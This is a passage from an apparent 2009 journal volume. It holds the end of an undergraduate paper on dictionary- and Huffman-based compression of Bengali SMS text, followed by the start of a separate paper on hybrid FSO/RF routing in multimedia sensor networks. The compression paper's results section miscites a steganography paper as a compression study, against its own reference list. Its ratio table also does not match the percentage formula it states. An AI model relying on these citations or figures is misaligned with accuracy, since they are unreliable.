Though a number of studies have been performed on data compression, in the specific field of SMS compression the number of available research works is not large. The remarkable point is that all the existing compression techniques are for other languages, mainly English, Chinese and Arabic, but not for Bengali. Bengali differs from these languages in its distinct symbols and conjunct letters. So, we had to gather knowledge from the compression techniques for other languages and then proceed to our own compression. The following two sections give a glimpse of the most recent research developments on the SMS compression issue.
Efficient Data Compression Scheme using Dynamic Huffman Code Applied on Arabic Language [1]
This method was proposed by Sameh et al. In addition to the categorization of data compression schemes with respect to message and codeword lengths, these methods are classified as either static or dynamic. A static method is one in which the mapping from the set of messages to the set of codewords is fixed before transmission begins, so that a given message is represented by the same codeword every time it appears in the message ensemble. The classic static defined-word scheme is Huffman coding. In Huffman coding, the assignment of codewords to source messages is based on the probabilities with which the source messages appear in the message ensemble. Messages which appear more frequently are represented by short codewords; messages with smaller probabilities map to longer codewords. These probabilities are determined before transmission begins. A code is dynamic if the mapping from the set of messages to the set of codewords changes over time. For example, dynamic Huffman coding involves computing an approximation to the probabilities of occurrence "on the fly", as the ensemble is being transmitted. The assignment of codewords to messages is then based on the relative frequencies of occurrence at each point in time. A message x may be represented by a short codeword early in the transmission because it occurs frequently at the beginning of the ensemble, even though its probability of occurrence over the total ensemble is low. Later, when the more probable messages begin to occur with higher frequency, the short codeword will be mapped to one of the higher-probability messages and x will be mapped to a longer codeword. There are two ways to represent data before transmission: fixed-length codes and variable-length codes.
The Huffman coding algorithm produces an optimal variable-length prefix code for a given alphabet in which frequencies are pre-assigned to each letter. Symbols that occur more frequently have shorter codewords than symbols that occur less frequently, and the two symbols that occur least frequently have codewords of the same length. Entropy is a measure of the information content of data; the entropy of the data specifies how much lossless compression can be achieved. However, finding the entropy of a data set is non-trivial. Note that there is no unique Huffman code, because assigning 0 and 1 to the two branches of a node is arbitrary, and when several nodes have the same probability it does not matter how they are connected.
The average message length has been adopted in this work as a measure of the efficiency of a code: it is the sum, over all codewords, of the codeword length multiplied by its probability of occurrence. The compression ratio has also been used as a measure of efficiency:

Compression ratio = (compressed file size / source file size) x 100%
The task of compression consists of two components: an encoding algorithm that takes a message and generates a "compressed" representation (hopefully with fewer bits), and a decoding algorithm that reconstructs the original message, or some approximation of it, from the compressed representation.
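As a concrete illustration of the static Huffman scheme described above, the following sketch (ours, not the authors' implementation) builds a prefix code from pre-assigned frequencies; more frequent symbols receive shorter codewords, and the two least frequent symbols end up with codewords of equal length:

```python
import heapq
from collections import Counter

def huffman_code(freqs):
    """Build a static Huffman prefix code from a {symbol: frequency} map."""
    if len(freqs) == 1:                       # degenerate one-symbol alphabet
        return {next(iter(freqs)): "0"}
    # Heap entries: (weight, tiebreaker, {symbol: partial codeword}).
    heap = [(w, i, {sym: ""}) for i, (sym, w) in enumerate(freqs.items())]
    heapq.heapify(heap)
    tie = len(heap)
    while len(heap) > 1:
        w1, _, c1 = heapq.heappop(heap)       # two least frequent subtrees
        w2, _, c2 = heapq.heappop(heap)
        # Prepending 0/1 here is arbitrary, which is why the Huffman
        # code is not unique.
        merged = {s: "0" + c for s, c in c1.items()}
        merged.update({s: "1" + c for s, c in c2.items()})
        heapq.heappush(heap, (w1 + w2, tie, merged))
        tie += 1
    return heap[0][2]

msg = "compress this message"
code = huffman_code(Counter(msg))
encoded = "".join(code[ch] for ch in msg)     # fewer bits than 8 per character
```

Decoding walks the bit string against the same table, which works because no codeword is a prefix of another.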
Genetic Algorithms in Syllable-Based Text Compression [2]
This method was proposed by Tomas Kuthan and Jan Lansky. To perform syllable-based compression, a procedure is needed
for decomposing words into syllables. They call an algorithm a hyphenation algorithm if, whenever given a word of a language, it returns its decomposition into syllables. By the definition of a syllable, any two different hyphenations of the same word always contain the same number of syllables. An algorithm that works as a hyphenation algorithm for every language is called a universal hyphenation algorithm; otherwise it is called a specific hyphenation algorithm. They describe four universal hyphenation algorithms: universal left (PU-L), universal right (PU-R), universal middle-left (PU-ML), and universal middle-right (PU-MR).
The first phase of all these algorithms is the same. First, they decompose the given text into words and, for each word, mark its consonants and vowels. Then all maximal subsequences of vowels are determined; these blocks form the cores of the syllables. All consonants before the first block belong to the first syllable, and those after the last block belong to the last syllable.

The algorithms differ in how they redistribute the inner groups of consonants between the two adjoining vowel blocks. PU-L puts all the consonants into the preceding syllable and PU-R puts them all into the subsequent one. PU-ML and PU-MR try to split the consonant group evenly: if its size is odd, PU-ML pushes the larger part to the left, while PU-MR pushes it to the right. The only exception is when PU-ML deals with a one-element group of consonants; it puts the single consonant to the right, to avoid creating the relatively uncommon syllables that begin with a vowel.
Hyphenating "priesthood":

  correct hyphenation:            priest-hood
  universal left (PU-L):          priesth-ood
  universal right (PU-R):         prie-sthood
  universal middle-left (PU-ML):  priest-hood
  universal middle-right (PU-MR): pries-thood

The effectiveness of these algorithms was then measured. In general, PU-L was the worst: it had the lowest number of correct hyphenations and produced the largest sets of unique syllables, mainly because it generates many vowel-initial syllables, which are not very common. PU-R was better, but the most successful were the two "middle" versions. English documents were best hyphenated by PU-MR, while on Czech texts PU-ML was slightly better.
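A minimal sketch of the four universal algorithms, assuming the vowels a, e, i, o, u; the function and mode names are our own, not Kuthan and Lansky's code:

```python
import re

def hyphenate(word, mode):
    """Universal hyphenation sketch. mode: 'L', 'R', 'ML', or 'MR'."""
    # Maximal vowel blocks form the cores of the syllables.
    blocks = [m.span() for m in re.finditer("[aeiou]+", word)]
    if len(blocks) <= 1:
        return [word]                 # at most one vowel block: one syllable
    syllables, cut = [], 0
    for (_, end), (start, _) in zip(blocks, blocks[1:]):
        group = word[end:start]       # inner consonant group between blocks
        if mode == "L":
            keep = len(group)         # all consonants stay with the left block
        elif mode == "R":
            keep = 0                  # all consonants go to the right block
        elif mode == "ML":
            # larger half left, except a lone consonant goes right
            keep = 0 if len(group) == 1 else (len(group) + 1) // 2
        else:                         # "MR": larger half right
            keep = len(group) // 2
        syllables.append(word[cut:end + keep])
        cut = end + keep
    syllables.append(word[cut:])      # trailing consonants join last syllable
    return syllables
```

Running it on "priesthood" reproduces the four hyphenations tabulated above.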
Lossless Compression of Short English Text Message for JAVA Enable Mobile Devices [3]
This method was proposed by Rafiqul et al. and published in the proceedings of the 11th International Conference on Computer and Information Technology (ICCIT 2008), December 2008, Khulna, Bangladesh. The compression process is divided into three steps: character masking; substring substitution (dictionary matching or partial coding); and bit mapping or encoding (using fixed modified Huffman coding).
The first step is character masking, a process in which character codes are changed or redefined on the basis of some specific criterion. Here, character masking is used to reduce the storage overhead of blank spaces: the spaces are first located and then encoded by a predefined codeword, which must be unique within the overall compression scheme. The same technique may be applied to multiple consecutive blank spaces. The modified message is then passed to the next step, dictionary matching or partial coding.

In the second step, the string produced by the first step passes through a partial coding that encodes each masked character on the basis of the character that follows it: the following character absorbs the masked space by encoding it. All spaces are thus merged, which can remove a considerable number of characters. The modified message is then passed through a dictionary matching scheme, which searches it for predefined, most commonly used words, substrings, and punctuation in order to reduce the total number of characters. The message is then forwarded to the final step, where the actual coding is performed.

In the final step they use static Huffman-style coding, modified so that, instead of computing codes on the fly, predefined codes are used in order to reduce space and time complexity. The codes for dictionary entries are also predefined. The whole message is thus encoded with a comparatively small number of bits, yielding a compressed result.
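A minimal sketch of this three-step pipeline; the marker byte, dictionary entries, and the 7-bit packing in Step 3 are our own stand-ins for the predefined codes of [3], which are not published in full:

```python
import re

# Hypothetical marker and dictionary entries (stand-ins, not the codes of [3]).
SPACE_MARK = "\x00"
DICTIONARY = {"the": "\x01", "and": "\x02", "for": "\x03"}

def compress(text):
    # Step 1: character masking - collapse each run of blanks to one marker.
    masked = re.sub(" +", SPACE_MARK, text)
    # Step 2: dictionary matching - replace common substrings with 1-byte
    # codes (a real scheme would match whole tokens, not raw substrings).
    for word, byte in DICTIONARY.items():
        masked = masked.replace(word, byte)
    # Step 3: fixed coding - a stand-in 7-bit packing instead of the
    # predefined modified-Huffman codes.
    bits = "".join(format(ord(ch) & 0x7F, "07b") for ch in masked)
    return bits, masked

def decompress(masked):
    # Invert the steps: expand dictionary codes, then restore the spaces.
    for word, byte in DICTIONARY.items():
        masked = masked.replace(byte, word)
    return masked.replace(SPACE_MARK, " ")
```

Even this toy version shows the effect: masking plus dictionary substitution shortens the string, and the fixed sub-8-bit coding then shrinks each remaining character.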
Compression of a Chinese Text [4]
This method was proposed by Phil Vines and Justin Zobel. The byte-oriented version of PPM (Prediction by Partial Matching) does not predict characters but rather halves of characters. It is reasonable to suppose that modifying PPM to deal with 16-bit characters should enable the model to capture the structure of the language more accurately and hence provide better compression. They identified several changes that need to be made to the PPM implementation described above to allow effective 16-bit coding of Chinese. First, the halving limit needs to be modified: the number of distinct 16-bit characters that can occur in a context is much greater than for 8-bit characters, so a larger probability space is required. Second, in conjunction with this change, the increment should also be increased to force more frequent halving and prevent the model from stagnating; their experiments suggest that a halving limit of 1024 and an increment of 16 are appropriate. Third, the usual method for estimating escape probabilities may not be appropriate, since so many characters are novel. Fourth, the model order must be chosen.

Most implementations encode bytes, but this is an arbitrary choice, and any unit can be used within the constraints of memory size and model order. For English, contexts and symbols are quickly repeated, so that after only a few kilobytes of text good compression is achieved, and contexts of as little as three characters can give excellent compression.
As byte-oriented PPM is a general method that gives good results not only for English text but for a wide variety of data types, an obvious option is to apply it directly to Chinese text. However, higher-order models take a longer time to accumulate contexts with probabilities that accurately reflect the distribution, so when memory is limited the model spends most of its time in the learning phase, where it emits a large number of escape codes and is unable to make accurate predictions. Poorer compression is thus observed, because contexts do not reappear sufficiently often before the model needs to be flushed and rebuilt. Reloading the model with the immediately preceding text after each flush is unlikely to help, since the problem is that there is not sufficient memory to hold a model that makes accurate predictions. It follows that increasing the amount of memory available for storing contexts could be expected to improve compression performance. However, assuming only moderate volumes of memory are available, managing even a character-based model can be problematic; the authors believe that, because of the number of distinct symbols, a word-based model is unlikely to be valuable. The implementation of PPM described above uses a simple memory-management strategy: all information is discarded when the available space is consumed.
III. PROPOSED SYSTEM
The prime concern of this thesis is to implement lossless compression of short Bengali text for low-powered devices with a low-complexity scheme. Many compression techniques already exist for languages such as English and Arabic, and many researchers are still working to improve the compression ratios for those languages, with results published in various conferences and journals. Yet although Bengali short messaging became available a couple of years ago, there is still no compression technique suited to the Bengali language.

Bengali text compression differs from English text compression in two main respects. First, compression techniques involving pseudo-coding of uppercase (or lowercase) letters are not applicable to Bengali text. Second, in Bengali we may employ a specific mechanism for coding dependent vowel signs to remove redundancy, which has no counterpart in English. Bengali has 91 distinct symbol units, including independent vowels, consonants, dependent vowel signs, two-part dependent vowel signs, additional consonants, various signs, additional signs, and Bengali numerals; a detailed list of Bengali symbols is available in the literature. Moreover, Bengali makes heavy use of conjuncts, which offers a further opportunity for redundancy removal.

Although English settled on a fixed encoding base long ago, Bengali has not yet adopted a single standard encoding scheme in practical applications, and Bengali Unicode is not yet in widespread use. This is a serious limitation for research in Bengali, and Bengali text compression suffers from the same problem.
A. Compression Process
In this paper, we propose a new dictionary-based compression technique for Bengali text. To facilitate efficient searching and low-complexity coding of the source text, we use the probabilities of occurrence of characters and groups of characters in a message, together with indexing of the dictionary entries. The compression scheme is divided into two stages:

Stage 1: Building the knowledge base.

Stage 2: Applying the proposed text-ranking approach to compress the source text.
Stage 1: Building the knowledge base

The test bed is formed from standard Bengali text collections from various sources. We consider a collection of texts of various categories and themes (news, documents, papers, essays, poems, and advertising) as the test bed. By reading the respective frequency statistics we select our knowledge-base entries and divide the frequencies into a four-level architecture. Assigning minimum-length codewords to the selected components is the main objective of this statistics-gathering phase. It is worth noting that, although a few domain-specific text collections are available, no sophisticated test bed for evaluating Bengali text compression exists yet. Since data compression, and dictionary-based text compression in particular, depends heavily on the structure, wording, and context of texts, a collection containing different types of text is a must for evaluating compression. In constructing the dictionary, we use a test bed of 109 files ranging from 4 KB to 1800 KB.
The variable-length coding (VLC) algorithm [1] is used to produce an optimal variable-length prefix code for the alphabet; note that in the preceding knowledge-base formation step, frequencies were already assigned to each letter. Symbols that occur more frequently have shorter codewords than symbols that occur less frequently, and the two least frequent symbols have codewords of the same length. As noted earlier, there is no unique Huffman code, because assigning 0 and 1 to the branches is arbitrary, and when several nodes have the same probability it does not matter how they are connected.
The average message length has been adopted in this work as a measure of the efficiency of the code:

Avg L = L1 * P(1) + L2 * P(2) + ... + Ln * P(n) = Sum_i Li * P(i)

The compression ratio is also used as a measure of efficiency:

Compression ratio = (compressed file size / source file size) x 100%

The task of compression consists of two components: an encoding algorithm that takes a message and generates a "compressed" representation (hopefully with fewer bits), and a decoding algorithm that reconstructs the original message
or some approximation of it, from the compressed representation.
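Both measures are straightforward to compute; a small sketch with an invented code table and probabilities:

```python
def average_length(code, probs):
    """Avg L = sum over symbols of codeword length times probability."""
    return sum(len(code[sym]) * p for sym, p in probs.items())

def compression_ratio(compressed_bits, source_bits):
    """Compression ratio = compressed size / source size * 100%."""
    return 100.0 * compressed_bits / source_bits

# Invented three-symbol example: half the probability mass on 'a'.
code = {"a": "0", "b": "10", "c": "11"}
probs = {"a": 0.5, "b": 0.25, "c": 0.25}
avg = average_length(code, probs)          # 1.5 bits per symbol on average
ratio = compression_ratio(avg, 8)          # versus an 8-bit fixed-length code
```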
Stage 2: Applying the proposed text-ranking approach to compress the source text
Text ranking is an elementary scheme used to assign weights or indices to texts or terms (especially word tokens) on the basis of some suitable criterion, ideally the frequency or probability of occurrence of the texts or their components. In our method, we read the source text and take the Unicode value of the corresponding data. It is here that our compression process differs most from others: existing methods do not select the longest successful match, whereas ours does. We start at the maximum level and proceed down through the hierarchical levels until a successful match is found. Note that the last level contains only single letters and their Unicode values, so a word that matches at no higher level is guaranteed to match there.

To perform compression, we also need a procedure for decomposing words into syllables. Following [2], an algorithm is a hyphenation algorithm if, whenever given a word of a language, it returns its decomposition into syllables; one that works for every language is a universal hyphenation algorithm, and otherwise it is a specific hyphenation algorithm. We use the four universal hyphenation algorithms: universal left (PU-L), universal right (PU-R), universal middle-left (PU-ML), and universal middle-right (PU-MR). The first phase of all of them is the same: the given text is decomposed into words, the letters and symbols of each word are marked, and all maximal subsequences of vowels are determined. These blocks form the cores of the syllables; all consonants before the first block belong to the first syllable and those after the last block belong to the last syllable.

After taking the longest successful match, we encode each matched element with the codewords obtained in Stage 1, and finally the resulting data is transmitted.
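The hierarchical longest-match lookup can be sketched as follows; the levels, entries, and codewords are hypothetical stand-ins for the Stage 1 knowledge base (a real code table would also have to be prefix-free across levels for decodability):

```python
# Hypothetical four-level knowledge base: the top level holds the longest
# units, and the letter level contains every symbol so matching never fails.
LEVELS = [
    {"hello": "000"},                                    # frequent words
    {"he": "001", "lo": "010"},                          # syllables / digrams
    {},                                                  # conjuncts, etc.
    {"h": "10", "e": "110", "l": "0110", "o": "0111"},   # single letters
]

def encode(text):
    out, i = [], 0
    while i < len(text):
        for level in LEVELS:          # try the highest (longest-unit) level first
            match = next((u for u in sorted(level, key=len, reverse=True)
                          if text.startswith(u, i)), None)
            if match is not None:
                out.append(level[match])
                i += len(match)
                break
        else:
            # The letter level must contain every symbol, so reaching here
            # is a configuration error rather than a normal outcome.
            raise ValueError("symbol missing from letter level: " + text[i])
    return "".join(out)
```

A whole-word hit consumes one codeword, while unseen words fall back to syllable and letter codes.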
B. Decompression Process
The decompression process can be divided into three steps:

Step 1: Grab the bit representation of the message.

Step 2: Identify the character representation.

Step 3: Display the decoded message.

All letters and symbols are coded in such a fashion that, by looking ahead at most a few symbols (typically the maximum codeword length), each character can be distinguished; this is the prefix property of Huffman coding.

In Step 1 the bit representation of the modified message is obtained; this is simply a matter of analyzing the bitmaps. The second step recognizes each separate bit pattern and the character or symbol it denotes, using the information from the fixed encoding table that was used at encoding time. The final step simply renders, i.e. displays, the characters recognized by decoding the received encoded message.
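Step 2 amounts to walking the received bit stream against the fixed encoding table; a minimal sketch with an invented three-symbol prefix code:

```python
def decode(bits, code):
    """Walk the bit stream, emitting a symbol whenever the accumulated
    bits equal a codeword; valid because the code is prefix-free."""
    inv = {cw: sym for sym, cw in code.items()}
    out, buf = [], ""
    for bit in bits:
        buf += bit
        if buf in inv:
            out.append(inv[buf])
            buf = ""
    if buf:
        raise ValueError("truncated or invalid bit stream")
    return "".join(out)
```

Because no codeword is a prefix of another, the first match is always the correct symbol boundary.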
IV. EXPERIMENTAL RESULTS
The proposed model of short-text compression for the Bengali language is more efficient than other SMS compression models, and is also expected to have lower complexity; the steps used here have not previously been combined in a single model. The basic idea is to use, on average, fewer than eight bits per character with static coding in place of the usual eight, thereby reducing the total number of bits required to represent or transmit the message. This modification is necessary because, on low-complexity devices, it is not sensible to compute the codes for each character at run time at the expense of time and space; it is a better approach to predefine codes of smaller total bit length for each character. The fixed codes are determined from heuristic values based on the dictionary in normal use. The ultimate aim is to use fewer bits and so reduce the load of characters.

We apply dictionary matching, or the multi-gram method, to improve the optimality of the compression. The multi-gram method replaces a number of frequently used substrings, or even whole strings, in the input message with specific predefined codewords. If any part of the message can be replaced by a single character, the total number of characters is correspondingly reduced. It is worth mentioning that combining the multi-gram or dictionary method with modified Huffman coding may yield roughly three- to five-fold compression. Dictionary matching plays a vital role in the compression ratio, because this thesis aims at the best possible lossless compression of Bengali text for wireless mobile devices with small memories and low processing speeds. Since we use Huffman codes of length at most seven bits, whereas each character normally requires eight, for n characters we can save n bits with fixed Huffman coding alone. In the next step we save further memory by masking blank spaces: for a Bengali short message of 200 characters it is usual to expect at least 25 spaces, and if these are merged into their neighbouring characters through character masking, those 25 characters are removed from the original message. It is necessary to mention here that the dictionary matching or multi-gram method is completely
dependent on the probability distribution of the input message, so the dictionary entries for Bengali text must be chosen with great care.
The compression scheme is implemented in Java 2 Micro Edition, with simulation in Java 2 SE 1.5; cellular phones adopting the proposed compression tool must be Java-powered. The implementation includes both the encoding and the decoding mechanisms.
A. Discussions on Results
The performance evaluation is based on various corpora. Since the prime aim of our proposed compression scheme is not to compress huge amounts of text but rather texts of the limited size affordable by mobile devices, i.e. embedded systems, we took blocks of fewer than one thousand characters chosen randomly from those files, ignoring binary and other corpus files, and performed the efficiency evaluation.
The most recent studies involving compression of text data are:

1. "Arabic Text Steganography using multiple diacritics" by Adnan Abdul-Aziz Gutub, Yousef Salem Elarian, Sameh Mohammad Awaideh, and Aleem Khalid Alvi [1].

2. "Lossless Compression of Short English Text Message for JAVA enable mobile devices" by Md. Rafiqul Islam, S. A. Ahsan Rajon, and Anondo Poddar [2].

We denote these two methods as DCM-1 and DCM-2 respectively.
The simulation was performed on a 2.0 GHz personal computer with 128 MB of RAM on a threading-enabled platform. The results for different blocks of text are as follows:
  Source               DCM-1   DCM-2   Proposed technique
  Prothom Alo          4.24    4.01    3.98
  Vorer Kagoj          3.78    4.19    3.98
  Amader Somoy         4.02    4.08    3.93
  Ekushe-khul.poem     4.98    3.98    3.65
  Ekushe-khul.Article  4.48    3.79    3.44
[Figure: bar chart comparing the compression ratios of DCM-1, DCM-2, and the proposed scheme on the five sources (Prothom Alo, Vorer Kagoj, Amader Somoy, Ekushe-khul poem, Ekushe-khul article).]
V. CONCLUSION
The prime objective of this undergraduate research was to develop a convenient low-complexity compression technique for small devices. The environment differs completely from the usual one (PCs with huge memories and far greater processing speed), and the challenge is to cope with the low memory and relatively low processing speed of cellular phones. The ultimate objective was therefore to devise a way to compress text messages that ensures optimal rate and efficiency on mobile phones, even if it is not the best approach for large-scale computing devices. For this reason, compared with ordinary data compression schemes, the proposed one has low complexity and low time consumption.
REFERENCES
[1] Sameh Ghwanmeh, Riyad Al-Shalabi, and Ghassan Kanaan, "Efficient Data Compression Scheme using Dynamic Huffman Code Applied on Arabic Language", Journal of Computer Science, 2006.
[2] Tomas Kuthan and Jan Lansky, "Genetic Algorithms in Syllable-Based Text Compression", Dateso 2007.
[3] Md. Rafiqul Islam, S. A. Ahsan Rajon, and Anondo Poddar, "Lossless Compression of Short English Text Message for JAVA Enable Mobile Devices", Proceedings of the 11th International Conference on Computer and Information Technology (ICCIT 2008), 25-27 December 2008, Khulna, Bangladesh.
[4] Phil Vines and Justin Zobel, "Compression of Chinese Text", Software: Practice and Experience, 1998.
[5] www.maximumcompression.com, "Data Compression Theory and Algorithms", retrieved August 10, 2009.
[6] Khair Md. Yeasir Arafat Majumder, Md. Zahurul Islam, and Mumit Khan, "Analysis of and Observations from a Bangla News Corpus", Proceedings of the 9th International Conference on Computer and Information Technology (ICCIT 2006), pp. 520-525, 2006.
[7] N. S. Dash, "Corpus Linguistics and Language Technology", 2005.
[8] Leonid Peshkin, "Structure Induction by Lossless Graph Compression", Proceedings of the 2007 Data Compression Conference (DCC'07).
[9] www.datacompression.com, "Theory of Data Compression".
QoS Provisioning Using Hybrid FSO-RF Based Hierarchical Model for Wireless
Multimedia Sensor Networks
Saad Ahmad Khan, Sheheryar Ali Arshad
Department of Electrical Engineering,
University Of Engineering & Technology, Lahore
Pakistan, 54890
Email: saad.ahmad@uet.edu.pk; s.ali@uet.edu.pk
Abstract - Our objective is to provide guaranteed packet delivery
service in time constrained sensor networks. The wireless
network is a highly variable environment, where available link
bandwidth may vary with network load. Since multimedia
applications require higher bandwidth so we use FSO links for
their transmission. The main advantage of FSO links is that they offer higher bandwidth and security, while RF links offer more
reliability. The routing in this multi-tier network is based on
directional geographic routing protocol, in which sensors route
their data via multi-hop paths, to a powerful base station,
through a cluster head. Some modifications have also been
incorporated in the MAC layer to improve the QoS of such
systems.
Index Terms — Wireless Multimedia Sensor Networks; Visual
Sensor Network; Hybrid RF-FSO; QoS Provisioning;
Hierarchical Sensor Network Model.
I. INTRODUCTION
RECENT advancements in the field of sensor networks show increased interest in the development of multimedia sensor networks consisting of sensor nodes that can communicate via free-space optics (FSO) or RF. A wireless multimedia sensor network typically consists of two types of sensor nodes: data-sensing nodes equipped with sensors such as acoustic or seismic sensors, and video sensor nodes that capture video of events of interest.
Multimedia contents, especially video streams, require
transmission bandwidth that is orders of magnitude higher
than that supported by current off-the-shelf sensors. Hence,
high-data-rate and low-power-consumption transmission
techniques must be leveraged. In this respect, free space optics
seems particularly promising for multimedia applications.
FSO refers to the transmission of modulated visible or infrared
(IR) beams through the atmosphere to obtain broadband
communications over distances of several kilometers. The
main limitation of FSO is the requirement that a direct line-of-
sight path exist between a sender and a receiver. However
FSO networks offer several unique advantages over RF
networks. These include the fact that FSO avoids interference
with existing RF communications infrastructure [1], is cheaply
deployed since there is no government licensing of scarce
spectrum required, is not susceptible to “jamming” attacks,
and provides a convenient bridge between the sensor network
and the nearest optical fiber. In addition, "well-designed" FSO systems are eye safe, consume less power, and yield smaller nodes, because only simple baseband analog and digital
circuitry is required, in contrast to RF communication. More
importantly, FSO networks enable high bandwidth burst
traffic, which makes it possible to support multimedia sensor networks [1].
Table 1. Typical QoS requirements for several service classes

  Class                            Application       Bandwidth (b/s)  Delay bound (ms)  Loss rate
  Non-real-time variable bit rate  Digital video     1M - 10M         Large             10^-6
  Available bit rate               Web browsing      1M - 10M         Large             10^-8
  Unspecified bit rate             File transfer     1M - 10M         Large             10^-8
  Constant bit rate                Voice             32k - 2M         30-60             10^-2
  Real-time variable bit rate      Video conference  128k - 6M        40-90             10^-3
II. RELATED WORK

Multi-path protocols with QoS measurement are a good fit for routing multimedia streams in WSNs. The Multi-flow Real-time Transport Protocol (MRTP) [2] is suited for real-time streaming of multimedia content by splitting packets over different flows; however, MRTP does not specifically address energy-efficiency considerations in WMSNs. In [3], a wakeup scheme is proposed to balance the energy and delay constraints.
An interesting feature of the protocol proposed in [4] is that it establishes multiple paths (optimal and suboptimal) with different energy metrics and assigned probabilities. In [5], a Multi-Path and Multi-SPEED routing protocol is proposed for WSNs to provide QoS differentiation in timeliness and reliability.
In [6], an application admission control algorithm is
proposed whose objective is to maximize the network lifetime
subject to bandwidth and reliability constraints of the
application. An application admission control method is
proposed in [7], which determines admissions based on the
added energy load and application rewards. While these
approaches address application level QoS considerations, they
fail to consider multiple QoS requirements (e.g., delay,
reliability, and energy consumption) simultaneously, as
required in WMSNs.
The use of image sensors is explored in [8], in which visual information is used to gather topology information that is then leveraged to develop efficient geographic routing schemes. A similar scenario is considered in [9], where imaging data for sensor networks leads to QoS considerations for routing.

Recent studies have considered the effect of unidirectional
links [10], and report that as many as 5% to 10% of links in
wireless ad hoc networks are uni-directional [11] due to
various factors. Routing protocols such as DSDV and AODV
which use a reverse path technique implicitly ignore such
unidirectional links, and are therefore not relevant in this
scenario. Other protocols such as DSR [10],
ZRP [12] or SRL [13] have been designed or modified to
accommodate unidirectionality, by detecting unidirectional
links, and then providing a bi-directional abstraction for such
links [14], [15], [16], [17]. The simplest and most efficient
solution proposed for dealing with unidirectionality is
Tunneling [18], in which bi-directionality is emulated for a
uni-directional link by using bi-directional links on a reverse
backchannel to establish the tunnel.
Tunneling also prevents implosion of acknowledgement
packets and looping by simply repressing link layer
acknowledgments for tunneled packets received on a
unidirectional link. Tunneling however works well in a mostly
bi-directional network with few unidirectional links [10].
Our contribution is twofold: we present a novel routing algorithm, and we introduce a novel approach to improving QoS at the network and MAC layers. In Section III we propose the hybrid RF-FSO system, which includes the routing model, a novel routing approach for sending the aggregated data to the sink via FSO links, and a suitable medium access control (MAC) layer protocol to improve the quality of service.
III. PROPOSED HYBRID FSO/RF BASED SYSTEM
The key observation behind our hybrid architecture is that in wired networks the delay is independent of the physical distance between source and sink, whereas in multi-hop wireless sensor networks the end-to-end delay depends not only on the single-hop delay but also on the distance a packet travels.
In view of this, the key design goal of such an architecture is to
support a soft real-time communication service with a desired
delivery speed across the sensor network, using FSO links for
high bandwidth applications and RF links for initiating routing
paths and low bandwidth applications.
NETWORK MODEL
In Figure 1, the base station is elevated over the RF/FSO WSN
deployment area. There are two types of channels in the
RF/FSO WSN:
1) RF peer-to-peer channels
2) Narrow line of sight (LOS) FSO channels that connect the
cluster heads to the base station.
The FSO link is achieved by using a passive modulating
optical retro-reflector mounted on each node. The base station
steers a narrow optical beam to interrogate all the FSO nodes
in the field. Nodes that are too far from the base station, or
which do not have Line Of Sight to the base station,
communicate with the base station through RF peer-to-peer
multi-hop links. Due to this, some of the nodes in the network act as cluster heads.
Figure 1 - Multiple-Tier Network Structure for Hybrid RF-FSO (Tier 1: base station; Tier 2: cluster heads; Tier 3: sensor nodes)
In such an RF/FSO-based wireless sensor network, none of the nodes communicates directly with the sink (base station) using RF links.
ROUTING PROTOCOL DESIGN
We consider a geographic WMSN consisting of a finite set of sensor nodes N = {n1, n2, ..., nN} and a finite set of links between them L = {l1, l2, ..., lN}.
The locations of the base station and the sensor nodes are fixed and can be obtained through GPS. The nodes at 1-hop distance from the base station act as cluster heads and use FSO links for their communication. The cluster heads are equipped with an RF/optical transceiver (consisting of an infrared/semiconductor laser and photo-detectors). Each cluster head Sx has a position (xa, ya) and directional orientation θx, and can orient its transmitting laser to cover a contiguous scanning area, given as

-α/2 + θx ≤ ϕx ≤ +α/2 + θx. (1)
Following the model depicted in Figure 2, each cluster head Sx can send data over an oriented sector ϕx of α degrees, for a fixed angle 0 < α < 2π. The receiving photo-detector is omni-directional and can thus receive data from any direction, so the receiving region of a cluster head is not limited to its communication sector. For another cluster head Sy to receive data from Sx, two conditions must be met:
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947-5500
1) The distance between them should be less than the communication range R(n) of the sender cluster head, i.e., D(Sx, Sy) ≤ R(n).
Figure 2 - Cluster head Sy falls into the communication sector of Sx
2) The receiving cluster head must be within the sector ϕx of the sender cluster head, i.e., (xb, yb) ∈ ϕx, where (xb, yb) is the location of the receiver cluster head. For this setup, Sx may directly talk to Sy; however, Sy can only talk to Sx via a reverse route, with other cluster heads in the network acting as simple routers [1].
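The two reception conditions above can be sketched as a simple geometric check. This is a minimal illustration; the function and variable names are ours, not the paper's:

```python
import math

def in_comm_sector(sender_pos, sender_theta, alpha, receiver_pos, comm_range):
    """Check the two reception conditions from Section III:
    (1) the distance is within the sender's communication range R(n), and
    (2) the receiver lies inside the sender's oriented sector phi_x,
        spanning [theta_x - alpha/2, theta_x + alpha/2]."""
    dx = receiver_pos[0] - sender_pos[0]
    dy = receiver_pos[1] - sender_pos[1]
    if math.hypot(dx, dy) > comm_range:          # condition (1)
        return False
    bearing = math.atan2(dy, dx)                 # angle of receiver as seen by sender
    # smallest signed angular difference to the laser orientation theta_x
    diff = (bearing - sender_theta + math.pi) % (2 * math.pi) - math.pi
    return abs(diff) <= alpha / 2                # condition (2)
```

Note that the check is asymmetric, matching the text: Sx may satisfy both conditions toward Sy while Sy's own sector does not cover Sx.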
Let us suppose that cluster head Sx initiates next-hop selection to find routing paths. The coordinates (xa, ya) of Sx are piggybacked in the message broadcast by Sx. Thus a neighbor node Sy knows the position of its upstream node Sx, its own position (xb, yb), and the sink's location. Further, we assume that each cluster head knows its neighborhood (any algorithm can be used to discover the neighborhood of a cluster head, e.g., the Neighborhood Discovery Algorithm (NDA) proposed in [1]). Since the cluster heads are equipped with hybrid RF/FSO links, the first phase of our design is to discover multiple routing paths from the source cluster heads to the sink cluster head or base station. To establish a path, the source initially broadcasts a probe (COMB) message to every 1-hop neighbor for route discovery. Each selected next-hop CH continues to broadcast the COMB message to find its own next hop, and so forth, until the sink CH is reached.
The information contained in a COMB message is shown below.

Fixed attributes: SourceID, SinkID, DeviationAngle, SrcToSinkHopCount
Variable attributes: HopCount, PreviousHop, Position

Figure 3 - Packet format of COMB
The COMB message is identified by its SourceID and SinkID.
DeviationAngle (denoted by α) specifies the unique direction
where a path will traverse during path establishment. The
fixed attributes in a COMB are set by the source and not
changed while the COMB is propagated across the network.
On the other hand, when an intermediate CH broadcasts a
COMB, it will change the variable attributes in the message.
HopCount is the hop count from the source to the current CH.
PreviousHop is the identifier of the current CH. Position
denotes the absolute coordinates of the current CH.
